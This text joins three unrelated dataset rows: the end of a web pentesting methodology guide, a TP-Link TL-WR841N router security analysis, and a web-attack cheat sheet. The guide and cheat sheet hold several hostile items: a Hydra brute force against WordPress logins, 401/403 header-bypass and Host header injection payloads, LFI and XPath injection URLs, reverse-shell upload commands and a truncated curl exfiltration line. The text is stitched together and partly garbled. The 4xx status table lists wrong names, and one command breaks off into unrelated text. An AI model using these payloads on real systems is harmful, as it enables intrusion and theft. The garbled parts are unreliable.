[**ParamSpider**](https://github.com/devanshbatham/ParamSpider): This script will find URLs with parameter and will list them.\n* [**galer**](https://github.com/dwisiswant0/galer) \\(go\\): HTML spider with JS rendering capabilities.\n* [**LinkFinder**](https://github.com/GerbenJavado/LinkFinder) \\(python\\): HTML spider, with JS beautify capabilities capable of search new paths in JS files. It could be worth it also take a look to [JSScanner](https://github.com/dark-warlord14/JSScanner), which is a wrapper of LinkFinder.\n* [**JSParser**](https://github.com/nahamsec/JSParser) \\(python2.7\\): A python 2.7 script using Tornado and JSBeautifier to parse relative URLs from JavaScript files. Useful for easily discovering AJAX requests. Looks like unmaintained.\n* [**relative-url-extractor**](https://github.com/jobertabma/relative-url-extractor) \\(ruby\\): Given a file \\(HTML\\) it will extract URLs from it using nifty regular expression to find and extract the relative URLs from ugly \\(minify\\) files.\n* [**JSFScan**](https://github.com/KathanP19/JSFScan.sh) \\(bash, several tools\\): Gather interesting information from JS files using several tools.\n* [**subjs**](https://github.com/lc/subjs) \\(go\\): Find JS files.\n* [**page-fetch**](https://github.com/detectify/page-fetch) \\(go\\): Load a page in a headless browser and print out all the urls loaded to load the page. \n\n### Brute Force directories and files\n\nStart **brute-forcing** from the root folder and be sure to brute-force **all** the **directories found** using **this method** and all the directories **discovered** by the **Spidering** \\(you can do this brute-forcing **recursively** and appending at the beginning of the used wordlist the names of the found directories\\). \nTools:\n\n* **Dirb** / **Dirbuster** - Included in Kali, **old** \\(and **slow**\\) but functional. Allow auto-signed certificates and recursive search. Too slow compared with th other options.\n* [**Dirsearch**](https://github.com/maurosoria/dirsearch) \\(python\\)**: It doesn't allow auto-signed certificates but** allows recursive search.\n* [**Gobuster**](https://github.com/OJ/gobuster) \\(go\\): It allows auto-signed certificates, it **doesn't** have **recursive** search.\n* [**Feroxbuster**](https://github.com/epi052/feroxbuster) **- Fast, supports recursive search.**\n* [**wfuzz**](https://github.com/xmendez/wfuzz) `wfuzz -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt https://domain.com/api/FUZZ`\n* [**ffuf** ](https://github.com/ffuf/ffuf)- Fast: `ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.10/FUZZ`\n\n**Recommended dictionaries:**\n\n* [https://github.com/carlospolop/Auto\\_Wordlists/blob/main/wordlists/bf\\_directories.txt](https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/bf_directories.txt)\n* [**Dirsearch** included dictionary](https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt)\n* [http://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10](http://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10)\n* [Assetnote wordlists](https://wordlists.assetnote.io/)\n* [https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content](https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content)\n * raft-large-directories-lowercase.txt\n * directory-list-2.3-medium.txt\n * RobotsDisallowed/top10000.txt\n* [https://github.com/random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists)\n* [https://github.com/google/fuzzing/tree/master/dictionaries](https://github.com/google/fuzzing/tree/master/dictionaries)\n* [https://github.com/six2dez/OneListForAll](https://github.com/six2dez/OneListForAll)\n* [https://github.com/random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists)\n* _/usr/share/wordlists/dirb/common.txt_\n* _/usr/share/wordlists/dirb/big.txt_\n* _/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt_\n\n_Note that anytime a new directory is discovered during brute-forcing or spidering, it should be Brute-Forced._\n\n### What to check on each file found\n\n* [**Broken link checker**](https://github.com/stevenvachon/broken-link-checker): Find broken links inside HTMLs that may be prone to takeovers\n* **File Backups**: Once you have found all the files, look for backups of all the executable files \\(\"_.php_\", \"_.aspx_\"...\\). Common variations for naming a backup are: _file.ext~, \\#file.ext\\#, ~file.ext, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp and file.old._ You can also use the tool [**bfac**](https://github.com/mazen160/bfac).\n* **Discover new parameters**: You can use tools like [**Arjun**](https://github.com/s0md3v/Arjun)**,** [**parameth**](https://github.com/maK-/parameth)**,** [**x8**](https://github.com/sh1yo/x8) **and** [**Param Miner**](https://github.com/PortSwigger/param-miner) **to discover hidden parameters. If you can, you could try to search** hidden parameters on each executable web file.\n * _Arjun all default wordlists:_ [https://github.com/s0md3v/Arjun/tree/master/arjun/db](https://github.com/s0md3v/Arjun/tree/master/arjun/db)\\_\\_\n * _Param-miner “params” :_ [https://github.com/PortSwigger/param-miner/blob/master/resources/params](https://github.com/PortSwigger/param-miner/blob/master/resources/params)\\_\\_\n * _Assetnote “parameters\\_top\\_1m”:_ [https://wordlists.assetnote.io/](https://wordlists.assetnote.io/)\\_\\_\n * _nullenc0de “params.txt”:_ [https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773](https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773)\n* **Comments:** Check the comments of all the files, you can find **credentials** or **hidden functionality**. \n * If you are playing **CTF**, a \"common\" trick is to **hide** **information** inside comments at the **right** of the **page** \\(using **hundreds** of **spaces** so you don't see the data if you open the source code with the browser\\). Other possibility is to use **several new lines** and **hide information** in a comment at the **bottom** of the web page.\n* **API keys**: If you **find any API key** there is guide that indicates how to use API keys of different platforms: [keyhacks](https://github.com/streaak/keyhacks), [**zile**](https://github.com/xyele/zile.git)**,** [truffleHog](https://github.com/dxa4481/truffleHog/), [SecretFinder](https://github.com/m4ll0k/SecretFinder), [RegHex](https://github.com/l4yton/RegHex%29\\).\n * Google API keys: If you find any API key looking like **AIza**SyA-qLheq6xjDiEIRisP\\_ujUseYLQCHUjik you can use the project [**gmapapiscanner**](https://github.com/ozguralp/gmapsapiscanner) to check which apis the key can access.\n* **S3 Buckets**: While spidering look if any **subdomain** or any **link** is related with some **S3 bucket**. In that case, [**check** the **permissions** of the bucket](buckets/).\n\n### Special findings\n\n**While** performing the **spidering** and **brute-forcing** you could find **interesting** **things** that you have to **notice**.\n\n#### **Interesting files**\n\n* Look for **links** to other files inside the **CSS** files.\n* [If you find a _**.git**_ file some information can be extracted](git.md)\n* If you find a _**.env**_ information such as api keys, dbs passwords and other information can be found.\n* If you find **API endpoints** you [should also test them](web-api-pentesting.md). These aren't files, but will probably \"look like\" them.\n* **JS files**: In the spidering section several tools that can extract path from JS files were mentioned. Also, It would be interesting to **monitor each JS file found**, as in some ocations, a change may indicate that a potential vulnerability was introduced in the code. You could use for example [**JSMon**](https://github.com/robre/jsmon)**.**\n * You should also check discovered JS files with [**RetireJS**](https://github.com/retirejs/retire.js/) or [**JSHole**](https://github.com/callforpapers-source/jshole) to find if it's vulnerable.\n * **Javascript Deobfuscator and Unpacker:** [https://lelinhtinh.github.io/de4js/](https://lelinhtinh.github.io/de4js/), [https://www.dcode.fr/javascript-unobfuscator](https://www.dcode.fr/javascript-unobfuscator)\n * **Javascript Beautifier:** [http://jsbeautifier.org/](https://beautifier.io/), [http://jsnice.org/](http://jsnice.org/)\n * **JsFuck deobfuscation** \\(javascript with chars:\"\\[\\]!+\" [https://ooze.ninja/javascript/poisonjs/](https://ooze.ninja/javascript/poisonjs/)\\)\n * \\*\\*\\*\\*[**TrainFuck**](https://github.com/taco-c/trainfuck)**:** `+72.+29.+7..+3.-67.-12.+55.+24.+3.-6.-8.-67.-23.`\n * In several occasions you will need to **understand regular expressions** used, this will be useful: [https://regex101.com/](https://regex101.com/)\n* You could also **monitor the files were forms were detected**, as a change in the parameter or the apearance f a new form may indicate a potential new vulnerable functionality.\n\n#### 403 Forbidden/Basic Authentication/401 Unauthorized \\(bypass\\)\n\n{% page-ref page=\"403-and-401-bypasses.md\" %}\n\n#### 502 Proxy Error\n\nIf any page **responds** with that **code**, it's probably a **bad configured proxy**. **If you send a HTTP request like: `GET https://google.com HTTP/1.1`** \\(with the host header and other common headers\\), the **proxy** will try to **access** _**google.com**_ **and you will have found a** SSRF.\n\n#### **NTLM Authentication - Info disclosure**\n\nIf the running server asking for authentication is **Windows** or you find a login asking for your **credentials** \\(and asking for **domain** **name**\\), you can provoke an **information disclosure**. \n**Send** the **header**: `“Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=”` and due to how the **NTLM authentication works**, the server will respond with internal info \\(IIS version, Windows version...\\) inside the header \"WWW-Authenticate\". \nYou can **automate** this using the **nmap plugin** \"_http-ntlm-info.nse_\".\n\n#### HTTP Redirect \\(CTF\\)\n\nIt is possible to **put content** inside a **Redirection**. This content **won't be shown to the user** \\(as the browser will execute the redirection\\) but something could be **hidden** in there.\n\n## Web Vulnerabilities Checking\n\nNow that a comprehensive enumeration of the web application has been performed it's time to check for a lot of possible vulnerabilities. You can find the checklist here:\n\n{% page-ref page=\"../../pentesting-web/web-vulnerabilities-methodology.md\" %}\n\nTODO: Complete the list of vulnerabilities and techniques with [https://six2dez.gitbook.io/pentest-book/others/web-checklist](https://six2dez.gitbook.io/pentest-book/others/web-checklist) and [https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web\\_application\\_security\\_testing/configuration\\_and\\_deployment\\_management\\_testing.html](https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/en/web_application_security_testing/configuration_and_deployment_management_testing.html), [https://owasp-skf.gitbook.io/asvs-write-ups/kbid-111-client-side-template-injection](https://owasp-skf.gitbook.io/asvs-write-ups/kbid-111-client-side-template-injection)\n\n## HackTricks Automatic Commands\n\n```text\nProtocol_Name: Web #Protocol Abbreviation if there is one.\nPort_Number: 80,443 #Comma separated if there is more than one.\nProtocol_Description: Web #Protocol Abbreviation Spelled out\n\nEntry_1:\n Name: Notes\n Description: Notes for Web\n Note: |\n https://book.hacktricks.xyz/pentesting/pentesting-web\n\nEntry_2:\n Name: Quick Web Scan\n Description: Nikto and GoBuster\n Command: nikto -host {Web_Proto}://{IP}:{Web_Port} &&&& gobuster dir -w {Small_Dirlist} -u {Web_Proto}://{IP}:{Web_Port} && gobuster dir -w {Big_Dirlist} -u {Web_Proto}://{IP}:{Web_Port}\n\nEntry_3:\n Name: Nikto\n Description: Basic Site Info via Nikto\n Command: nikto -host {Web_Proto}://{IP}:{Web_Port}\n\nEntry_4:\n Name: WhatWeb\n Description: General purpose auto scanner\n Command: whatweb -a 4 {IP}\n\nEntry_5:\n Name: Directory Brute Force Non-Recursive\n Description: Non-Recursive Directory Brute Force\n Command: gobuster dir -w {Big_Dirlist} -u {Web_Proto}://{IP}:{Web_Port}\n\nEntry_6:\n Name: Directory Brute Force Recursive\n Description: Recursive Directory Brute Force\n Command: python3 {Tool_Dir}dirsearch/dirsearch.py -w {Small_Dirlist} -e php,exe,sh,py,html,pl -f -t 20 -u {Web_Proto}://{IP}:{Web_Port} -r 10\n\nEntry_7:\n Name: Directory Brute Force CGI\n Description: Common Gateway Interface Brute Force\n Command: gobuster dir -u {Web_Proto}://{IP}:{Web_Port}/ -w /usr/share/seclists/Discovery/Web-Content/CGIs.txt -s 200\n\nEntry_8:\n Name: Nmap Web Vuln Scan\n Description: Tailored Nmap Scan for web Vulnerabilities\n Command: nmap -vv --reason -Pn -sV -p {Web_Port} --script=`banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)` {IP}\n\nEntry_9:\n Name: Drupal\n Description: Drupal Enumeration Notes\n Note: |\n git clone https://github.com/immunIT/drupwn.git for low hanging fruit and git clone https://github.com/droope/droopescan.git for deeper enumeration\n\nEntry_10:\n Name: WordPress\n Description: WordPress Enumeration with WPScan\n Command: |\n ?What is the location of the wp-login.php? Example: /Yeet/cannon/wp-login.php\n wpscan --url {Web_Proto}://{IP}{1} --enumerate ap,at,cb,dbe && wpscan --url {Web_Proto}://{IP}{1} --enumerate u,tt,t,vp --passwords {Big_Passwordlist} -e\n\nEntry_11:\n Name: WordPress Hydra Brute Force\n Description: Need User (admin is default)\n Command: hydra -l admin -P {Big_Passwordlist} {IP} -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'\n```\n\n"}}},{"rowIdx":320,"cells":{"text":{"kind":"string","value":"# TP Link TL-WR841N router cybersecurity analysis\n\nCyber security analysis of TP Link TL-WR841N router.\n\nGithub Pages version of this analysis can be found by [following this link](https://kostasereksonas.github.io/tp-link-tl-wr841n-security-analysis/)\n\nTable of Contents\n=================\n* [TP Link TL-WR841N router cybersecurity analysis](#TP-Link-TL-WR841N-router-cybersecurity-analysis)\n* [Plan of Analysis](#Plan-of-Analysis)\n* [Technical Information](#Technical-Information)\n\t* [Open Ports](#Open-Ports)\n\t* [TCP Port Scan](#TCP-Port-Scan)\n\t* [UDP Port Scan](#UDP-Port-Scan)\n\t* [OS Detection](#OS-Detection)\n* [Written Exploits](#Written-Exploits)\n\t* [Authentication Bypass Exploit](#Authentication-Bypass-Exploit)\n\t* [Command Injection Exploit](#Command-Injection-Exploit)\n\n# Plan of Analysis\n\nThe plan of TP Link TL-WR841N router cybersecurity analysis is as follows:\n\n1. Gather of technical and network information about the router.\n2. Intercept and analyze network traffic of the router.\n3. Find firmware and a list of software installed within the router.\n4. Check CVE lists for published known exploits found within the router's software and check their severity score.\n5. Investigate found exploits and try a practical exploitation of these vulnerabilities on a given TP Link TL-WR841N router (i.e. found or custom made scripts for exploiting a certain vulnerability) for getting a better understanding of potential risks that found vulnerabilities pose.\n6. Research the possible ways of mitigation for the given the risks.\n7. Give conclusions of the analysis.\n8. Research the possibility of using `OpenWRT` as the router's firmware.\n\n# Technical Information\n\nIn this section I will present the technical and network information that I have gathered about tested TP Link TP-WR841N router. This section includes information about:\n\t1. Finding open TCP ports.\n\t2. Finding open UDP ports.\n\t3. Detection of the Operating System (OS) within the TP Link TL-WR841M router.\n\t4. Detection of the version of the OS that is running within the TP Link TL-WR841M router.\n\n## Open Ports\n\nIn this subsection of Technical information gathering section I am presenting the results of a ***port scan*** that I have done on the tested router. For all the further scans `nmap` tool was used.\n\n### TCP Port Scan\n\nAs mentioned before, for finding open TCP ports and services that are running on top of them, `nmap` tool was used. The command for this specific scan was `nmap -v -sS -sV -sC -p- X.X.X.X`, where `X.X.X.X` is IP address of the TP Link router. Short description of every used flag is presented below:\n\n```\n-v\t\tVerbosity. Gives more information about what the scan is doing.\n-sS\t\tStealth scan. Fast, accurate and non-intrusive test of a selected target.\n-sV\t\tVersion scan. Used to detect versions of services running on specific open ports of IP Camera.\n-sC\t\tScripts scan. Uses a default set of most common `nmap` scripts.\n-p-\t\tCheck all 65535 TCP ports for if they are open.\n```\n\nResults of this scan are presented below:\n\n```\nPORT STATE SERVICE VERSION\n22/tcp open ssh Dropbear sshd 2012.55 (protocol 2.0)\n| ssh-hostkey:\n| 1024 2d:20:4b:ed:24:f6:13:5d:32:af:44:88:35:5b:04:de (DSA)\n|_ 1040 df:61:f7:f5:bc:aa:e6:9a:2d:6a:20:cc:98:38:68:38 (RSA)\n80/tcp open http TP-LINK WR841N WAP http config\n|_http-title: TL-WR841N\n1900/tcp open upnp ipOS upnpd (TP-LINK TL-WR841N WAP 11.0; UPnP 1.0)\n49152/tcp open http Huawei HG8245T modem http config\n|_http-title: Site doesn't have a title.\n```\n\nNmap scan found ***4*** TCP ports whose numbers are `22`, `80`, `1900` and `49152`. Some details about each port are presented below:\n1. Port `22` is a standart port for `ssh` service and on top of this port ***Dropbear sshd 2012.55*** service is running. Also a couple of ssh hostkeys were discovered.\n2. Port `80` is a standard `http` port and is controlled by ***TP-LINK WR841N WAP http config*** software.\n3. Port `1900` is an `upnp` or ***universal plug and play*** port and is controlled by ***ipOS upnpd*** service.\n4. Port `49152` is a port for ***alternate http service*** and is controlled by ***Huawei HG8245T modem http config*** service. It looks like a different built-in module within the router for connecting to some kind of http services.\n\n### UDP Port Scan\n\nAfter finding TCP ports I have conducted a search for ***UDP*** ports. Same `nmap` tool was used, although this time `-sU` flag for ***UDP scan*** was used insead of TCP stealth scan (-sS). The full command for this scan was `nmap -v -sU -sV X.X.X.X`, where `X.X.X.X` is IP address for the TP Link router. Results for this scan are presented below:\n\n```\nPORT STATE SERVICE VERSION\n53/udp open domain ISC BIND 9.10.3-P4 (Debian Linux)\n| dns-nsid:\n|_ bind.version: 9.10.3-P4-Debian\n|_dns-recursion: Recursion appears to be enabled\n67/udp open|filtered dhcps\n1900/udp open|filtered upnp\n```\n\nNmap scan found ***3*** open UDP ports with numbers `53`, `67` and `1900`. Some details about each port are presented below:\n1. Port `53` has a `domain` service controlled by ***ISC BIND 9.10.3-P4*** and it is used for some DNS related stuff. Also ***DNS recursion*** seems to be enabled. Further reading needs to be done to fully understand what it is used for and what could potential risks of this service be.\n2. Port `67` is controlled by `dhcps` or ***Dynamic Host Configuration Protocol*** service and could be used for automatic IP network configuration.\n3. Port `1900` is used for `upnp` or ***universal plug and play*** service, same as it's TCP counterpart.\n\n## OS Detection\n\nTo determine type and version of the OS installed within the TP Link router, `nmap` tool with `-O` flag was used. The full command was `nmap -v -sS -sV -O X.X.X.X`, where X.X.X.X is an IP address of TP Link router. The results of this scan are presented below:\n\n```\nDevice type: general purpose\nRunning: Linux 2.6.X\nOS CPE: cpe:/o:linux:linux_kernel:2.6\nOS deta Linux 2.6.17 - 2.6.36\n```\n\nThe router is recognized as a `general purpose` device and it is running a `Linux 2.6` operating system with likely version ranging from `2.6.17` to `2.6.36`.\n\n# Written Exploits\n\nIn this section I will present an in-depth analysis of couple exploits for TP LINK TL-WR841N router that I have found in [exploit-db page](https://www.exploit-db.com/). These exploits are:\n1. [Authenticaton Bypass Exploit](https://www.exploit-db.com/exploits/44781).\n2. [Command Injection Exploit](https://www.exploit-db.com/exploits/50058).\n\nI will start with ***Authentication Bypass Exploit*** and later go to analyze ***Command Injection Exploit***.\n\n## Authentication Bypass Exploit\n\nThis exploit, found on [Exploit-db](https://www.exploit-db.com/exploits/44781) was written by BlackFog team at [SecureLayer7.net](https://www.SecureLayer7.net/). If the Referer Header is set as `http://192.168.0.1/mainFrame.htm`, then no authentication is needed for following commands. Although, this exploit did not work for my router.\n\n![Failed Auth Bypass](/images/Failed_Auth_Bypass.png)\n\n## Command Injection Exploit\n\nFor now I have tried to run the Python script found in the Exploit-db link but it did not work.\n\n![Failed Injection](/images/Failed_Injection.png)\n\n# Code analysis\n\nIn this section I will analyze the [Index page source code](/scripts/login.js) and [linked encryption file](/scripts/encrypt.js) javascript code files.\n"}}},{"rowIdx":321,"cells":{"text":{"kind":"string","value":"---\ndescription: >-\n TODO: Need to pull web notes out of the OS Agnostic section (and then rename\n that to something better!)\n---\n\n# Web Notes\n\n{% hint style=\"success\" %}\nHack Responsibly.\n\nAlways ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. &#x20;\n{% endhint %}\n\n## Checklist\n\n* [ ] View SSL certificates for domains, emails, usernames\n* [ ] View source code&#x20;\n* [ ] Check `/robots.txt`, `.htaccess`, `.htpasswd`\n* [ ] Check HTTP Request/Response headers\n* [ ] Check for files/directories with `gobuster`/`dirbuster`\n* [ ] Check for virtual hosts/subdomains\n* [ ] View console\n* [ ] Use `nikto`\n* [ ] Check HTTP OPTIONS\n* [ ] HTTP PUT / POST File upload&#x20;\n* [ ] Parameter fuzzing with `ffuf`\n* [ ] Browser vs. Burp response\n* [ ] Shell shock (`cgi-bin/status`)\n* [ ] Make wordlist with `cewl` and directory/login brute force\n* [ ] `nmap --script http-enum 10.10.10.10`\n* [ ] Apache version exploit & other base server exploits\n\n## HTTP Response Codes\n\n```bash\n#Informational Response Codes (1xx)\n100 - Continue\n101 - Switching Protocols\n102 - Processing\n\n#Success Response Codes (2xx)\n200 - OK\t\t\t\t 206 - Partial Content\n201 - Created\t\t\t\t 207 - Multi-status\n202 - Accepted 208 - Already Reported\n203 - Non-authoritative Info\t\t226 - IM Used\n204 - No Content\t\t\t 250 - Low Storage Space\n205 - Reset Content\n\n#Redirection Response Codes (3xx)\n300 - Multiple Choices\t\t\t 304 - Not Modified\n301 - Moved Permanently\t\t\t 305 - Use Proxy\n302 - Found\t\t\t\t 307 - Temporary Redirect\n303 - See Other\t\t\t\t 308 - Permanent Redirect\n\n#Client Error Response Codes (4xx)\n400 - Multiple Choices\t\t\t 410 - Not Modified\n401 - Moved Permanently\t\t\t 411 - Use Proxy\n402 - Found\t\t\t\t 412 - Temporary Redirect\n403 - See Other\t\t\t\t 413 - Permanent Redirect\n404 - Multiple Choices\t\t\t 414 - Not Modified\n405 - Moved Permanently\t\t\t 415 - Use Proxy\n406 - Found\t\t\t\t 416 - Temporary Redirect\n407 - See Other\t\t\t\t 417 - Permanent Redirect\n408 - Found\t\t\t\t 418 - Temporary Redirect\n409 - See Other\t\t\t\n\n#Server Error Response Codes (5xx)\n500 - Internal Server Error\t\t 508 - Loop Detected\n501 - Not Implemented\t\t\t 509 - Bandwidth Limited\n502 - Bad Gateway\t\t\t 510 - Not Extended\n503 - Service Unavailable\t\t 511 - Network Auth Requried\n504 - Gateway Timeout\t\t\t 550 - Permission Denied\n505 - HTTP Ver Not Supported\t\t551 - Option Not Supported\n506 - Variant Also Negotiates\t\t598 - Nework Read Timeout Error\n507 - Insufficient Storage\t\t 599 - Network Connect Timeout Error\n```\n\n## Headers\n\n### HTTP Authorization headers\n\n```bash\n# Basic Auth (Base64)\nAuthorization: Basic AXVubzpwQDU1dzByYM==\n\n# Bearer Token (JWT)\nAuthorization: Bearer \n\n# API Key\nGET /endpoint?api_key=abcdefgh123456789\nX-API-Key: abcdefgh123456789\n\n# Digest Auth\nAuthorization: Digest username=”admin” Realm=”abcxyz” nonce=”474754847743646”, uri=”/uri” response=”7cffhfr54685gnnfgerg8”\n\n# OAuth2.0\nAuthorization: Bearer hY_9.B5f-4.1BfE\n\n# Hawk Authentication\nAuthorization: Hawk id=\"abcxyz123\", ts=\"1592459563\", nonce=\"gWqbkw\", mac=\"vxBCccCutXGV30gwEDKu1NDXSeqwfq7Z0sg/HP1HjOU=\"\n\n# AWS signature\nAuthorization: AWS4-HMAC-SHA256 Credential=abc/20200618/us-east-1/execute-api/aws4_\n```\n\n### HTTP Security Headers\n\n1. [X-Frame-Options](https://www.netsparker.com/whitepaper-http-security-headers/#XFrameOptionsHTTPHeader)\n2. [X-XSS-Protection](https://www.netsparker.com/whitepaper-http-security-headers/#XXSSProtectionHTTPHeader)\n3. [X-Content-Type-Options](https://www.netsparker.com/whitepaper-http-security-headers/#XContentTypeOptionsHTTPHeader)\n4. [X-Download-Options](https://www.netsparker.com/whitepaper-http-security-headers/#XDownloadOptionsHTTPHeader)\n5. [Content Security Policy (CSP)](https://www.netsparker.com/whitepaper-http-security-headers/#ContentSecurityPolicyHTTPHeader)\n6. [HTTP Strict Transport Security (HSTS)](https://www.netsparker.com/whitepaper-http-security-headers/#HTTPStrictTransportSecurityHSTSHTTPHeader)\n7. [HTTP Public Key Pinning](https://www.netsparker.com/whitepaper-http-security-headers/#HTTPPublicKeyPinning)\n8. [Expect-CT](https://www.netsparker.com/whitepaper-http-security-headers/#ExpectCTHTTPHeader)\n9. [Referrer-Policy](https://www.netsparker.com/whitepaper-http-security-headers/#ReferrerPolicyHTTPHeader)\n\n* [https://www.netsparker.com/whitepaper-http-security-headers/](https://www.netsparker.com/whitepaper-http-security-headers/)\n* [https://owasp.org/www-project-secure-headers/](https://owasp.org/www-project-secure-headers/)\n\n### Header Bypass Methods\n\n```bash\n# Add something like 127.0.0.1, localhost, 192.168.1.2, target.com or /admin, /console\nClient-IP:\nConnection:\nContact:\nForwarded:\nFrom:\nHost:\nOrigin:\nReferer:\nTrue-Client-IP:\nX-Client-IP:\nX-Custom-IP-Authorization:\nX-Forward-For:\nX-Forwarded-For:\nX-Forwarded-Host:\nX-Forwarded-Server:\nX-Host:\nX-Original-URL:\nX-Originating-IP:\nX-Real-IP:\nX-Remote-Addr:\nX-Remote-IP:\nX-Rewrite-URL:\nX-Wap-Profile:\n\n# Try to repeat same Host header 2 times\nHost: legit.com\nStuff: stuff\nHost: evil.com\n\n# Bypass type limit\nAccept: application/json, text/javascript, */*; q=0.01\nAccept: ../../../../../../../../../etc/passwd{{'\n\n# Try to change the HTTP version from 1.1 to HTTP/0.9 and remove the host header\n\n# 401/403 bypasses \n# Whitelisted IP 127.0.0.1 or localhost\nClient-IP: 127.0.0.1\nForwarded-For-Ip: 127.0.0.1\nForwarded-For: 127.0.0.1\nForwarded-For: localhost\nForwarded: 127.0.0.1\nForwarded: localhost\nTrue-Client-IP: 127.0.0.1\nX-Client-IP: 127.0.0.1\nX-Custom-IP-Authorization: 127.0.0.1\nX-Forward-For: 127.0.0.1\nX-Forward: 127.0.0.1\nX-Forward: localhost\nX-Forwarded-By: 127.0.0.1\nX-Forwarded-By: localhost\nX-Forwarded-For-Original: 127.0.0.1\nX-Forwarded-For-Original: localhost\nX-Forwarded-For: 127.0.0.1\nX-Forwarded-For: localhost\nX-Forwarded-Server: 127.0.0.1\nX-Forwarded-Server: localhost\nX-Forwarded: 127.0.0.1\nX-Forwarded: localhost\nX-Forwared-Host: 127.0.0.1\nX-Forwared-Host: localhost\nX-Host: 127.0.0.1\nX-Host: localhost\nX-HTTP-Host-Override: 127.0.0.1\nX-Originating-IP: 127.0.0.1\nX-Real-IP: 127.0.0.1\nX-Remote-Addr: 127.0.0.1\nX-Remote-Addr: localhost\nX-Remote-IP: 127.0.0.1\n\n# Fake Origin - make GET request to accesible endpoint with:\nX-Original-URL: /admin\nX-Override-URL: /admin\nX-Rewrite-URL: /admin\nReferer: /admin\n# Also try with absolute url https:/domain.com/admin\n\n# Method Override\nX-HTTP-Method-Override: PUT\n\n# Provide full path GET\nGET https://vulnerable-website.com/ HTTP/1.1\nHost: evil-website.com\n\n# Add line wrapping\nGET /index.php HTTP/1.1\n Host: vulnerable-website.com\nHost: evil-website.com\n```\n\n## Cookies\n\n* [https://cookiepedia.co.uk/](https://cookiepedia.co.uk/)\n * \"Largest Database of Pre-Categorized Cookies\"\n * Scans a website for cookie usage\r\n\n### JavaScript\n\n```bash\n# can pair with alert();\ndocument.cookie; \r\n```\n\n### Ruby\n\n```ruby\n# Use HTTP::Cookie library \n# Following examples were taken from the readme.md from above repository\n\n## One cookie\n\tcookie = HTTP::Cookie.new(\"uid\", \"u12345\", domain: 'example.org',\n\t\t\t\t\t\t for_domain: true,\n\t\t\t\t\t\t path: '/',\n\t\t\t\t\t\t max_age: 7 * 86400)\n\theader['Set-Cookie'] = cookie.set_cookie_value\n\t\n\t## Several cookies\n\tjar = HTTP::CookieJar.new\n\tjar.load(filename) if File.exist?(filename)\n\theader[\"Set-Cookie\"].each { |value| jar.parse(value, uri) }\n\theader[\"Cookie\"] = HTTP::Cookie.cookie_value(jar.cookies(uri))\r\n```\n\n### Python2&#xD;\n\n```bash\n# python has a cookie library!\n# Following example taken from the python documentation\n\nimport cookielib, urllib2\ncj = cookielib.CookieJar()\nopener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))\nr = opener.open(\"http://example.com/\")\n```\n\n### Edit cookies in chrome&#xD;\n\nSettings -> Advanced Settings -> Privacy -> Content -> Cookies\r\n\nor \"Edit This Cookie\" plugin\r\n\n\r\n\n### Edit cookies in firefox&#xD;\n\nPreferences -> Privacy -> Show Cookies\r\n\nor \"Cookies Manager+\" addon\n\n## Local File Inclusion (LFI) / Remote File Inclusion (RFI)\n\nCommon and/or useful files to check for when exploiting Local File Inclusion (for both Linux and Windows): [https://github.com/tennc/fuzzdb/tree/master/dict/BURP-PayLoad/LFI](https://github.com/tennc/fuzzdb/tree/master/dict/BURP-PayLoad/LFI)\n\n### LFI - Retrieve HTML/PHP files without executing\n\n```\nhttps://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php\n```\n\n## File Upload\n\n**HTTP PUT**\n\n```bash\nnmap -p 80 $ip --script http-put --script-args http-put.url='/home/zweilos/php-reverse-shell.php',http-put.file='rev.php'​\ncurl -X PUT -d '' http://$ip/rev.php\n```\n\n**Cadaver**\n\n```\ncadaver http://10.10.10.10/dav/put /tmp/shell.php\n```\n\n**JPG to PNG shell**\n\n```php\n //rev.php\nexiftool \"-comment<=rev.php\" malicious.png\n```\n\n**Upload Files through POST**\n\n```bash\n# POST file\ncurl -X POST -F \"file=@/file/location/rev.php\" http://$ip/upload.php --cookie \"cookie\"​\n\n# POST binary data to web form\ncurl -F \"field=susceptible to MITM attack!\nIntegrated Windows Authentication\n-->will not function over proxy\nForm-Based Authentication\n-->not inherently encrypted, often poor implimentation\n```\n\n### XPATH Dump\n\n```\nhttps://example.com/accounts.php?user=test\"]/../*%00&xpath_debug=1\n```\n\nwhatismybrowser.com - research User-Agent strings\n\nUse `curl` to exfiltrate file on remote server (from attackers box): `curl -d @/ `\n\nin order to proxy tools that have no proxy option: create burn proxy 127.0.0.1:80 [Ippsec:HacktheBox - Granny & Grandpa](https://www.youtube.com/watch?v=ZfPVGJGkORQ)\n\nvulnerability testing for webdav (or other file upload vulns!): `davtest`\n\nbypassing filetype filters with http MOVE command to rename allowed filetype [Ippsec:HacktheBox - Granny & Grandpa](https://www.youtube.com/watch?v=ZfPVGJGkORQ)\n\nWordpress enumeration: `wpscan -u [--disable-tls-checks]`\n\npull Google cached webpage if regular site not loading: `cache:https://`\n\nVirtual Host Routing: substitute IP for hostname to get different results\n\nhydra against http wordpress login walkthrough: [IppSec:HacktheBox - Apocalyst](https://www.youtube.com/watch?v=TJVghYBByIA)\n\nweb application fuzzer: [wfuzz](https://github.com/xmendez/wfuzz)\n\nWeb site \"flyover\" surveillance: [Aquatone](https://github.com/michenriksen/aquatone) \"is a tool for visual inspection of websites across a large amount of hosts and is convenient for quickly gaining an overview of HTTP-based attack 